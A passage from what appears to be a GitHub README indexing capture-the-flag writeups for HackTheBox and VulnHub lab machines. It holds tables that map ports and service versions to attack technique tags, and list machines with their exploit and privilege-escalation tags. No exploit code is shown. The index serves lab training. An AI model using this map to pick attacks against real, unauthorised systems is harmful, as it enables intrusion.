6.0`<br /><br />`http/Microsoft IIS httpd 7.5` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | | 8. | `111/tcp` | | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs), [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | | | 9. | `135/tcp` | | [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | | | 10. | `139/tcp` | `netbios-ssn/Microsoft Windows netbios-ssn`<br /><br />`netbios-ssn/Samba smbd 3.X - 4.X (workgroup: WORKGROUP)` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root) | | 11. | `161/tcp` | | [`enumerate_proto_snmp`](https://github.com/7h3rAm/writeups#enumerate_proto_snmp) | | | 12. | `389/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | | | 13. | `443/tcp` | `ssl/https/Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | | 14. | `445/tcp` | `microsoft-ds/Windows Server 2019 Standard 17763 microsoft-ds` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | | 15. | `636/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | | | 16. | `1337/tcp` | `http/Apache httpd 2.4.7 ((Ubuntu))` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 17. | `1433/tcp` | `ms-sql-s/Microsoft SQL Server 14.00.1000.00` | [`enumerate_proto_mssql`](https://github.com/7h3rAm/writeups#enumerate_proto_mssql), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig) | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell) | | 18. | `1521/tcp` | | [`enumerate_proto_oracle`](https://github.com/7h3rAm/writeups#enumerate_proto_oracle), [`enumerate_proto_postgres`](https://github.com/7h3rAm/writeups#enumerate_proto_postgres) | | | 19. | `1974/tcp` | | | [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 20. | `2049/tcp` | `nfs_acl/2-3 (RPC #100227)`<br /><br />`nfs_acl/3 (RPC #100227)` | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs) | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid) | | 21. | `3000/tcp` | `http/Node.js Express framework` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 22. | `3232/tcp` | | [`enumerate_proto_distcc`](https://github.com/7h3rAm/writeups#enumerate_proto_distcc) | | | 23. | `3306/tcp` | | [`enumerate_proto_mysql`](https://github.com/7h3rAm/writeups#enumerate_proto_mysql) | | | 24. | `6660/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 25. | `6661/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 26. | `6662/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 27. | `6663/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 28. | `6664/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 29. | `6665/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 30. | `6666/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 31. | `6667/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 32. | `6668/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 33. | `6669/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 34. | `7000/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 35. | `8080/tcp` | `http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_rdp`](https://github.com/7h3rAm/writeups#enumerate_proto_rdp), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 36. | `9999/tcp` | `abyss?` | | [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 37. | `10000/tcp` | `http/SimpleHTTPServer 0.6 (Python 2.7.3)` | | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof) | | 38. | `27017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | | | 39. | `28017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | | <a name="machines"></a> ## 💥 Machines [↟](#contents) | # | Name | Infra | Killchain | TTPs | |:---:|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|:---------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100"/> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | | 2. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/ratings.png" width="59" height="20"/> | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 3. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100"/> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/ratings.png" width="59" height="20"/> | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 5. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/ratings.png" width="59" height="20"/> | [htb#51](https://app.hackthebox.eu/machines/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100"/> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | | 6. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100"/> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 7. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100"/> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 8. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/ratings.png" width="59" height="20"/> | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | | 9. | [Cronos](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/ratings.png" width="59" height="20"/> | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 10. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 11. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/ratings.png" width="59" height="20"/> | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100"/> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | | 12. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100"/> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 13. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 14. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/ratings.png" width="59" height="20"/> | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | | 15. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/ratings.png" width="59" height="20"/> | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | | 16. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 17. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 18. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | | 19. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), 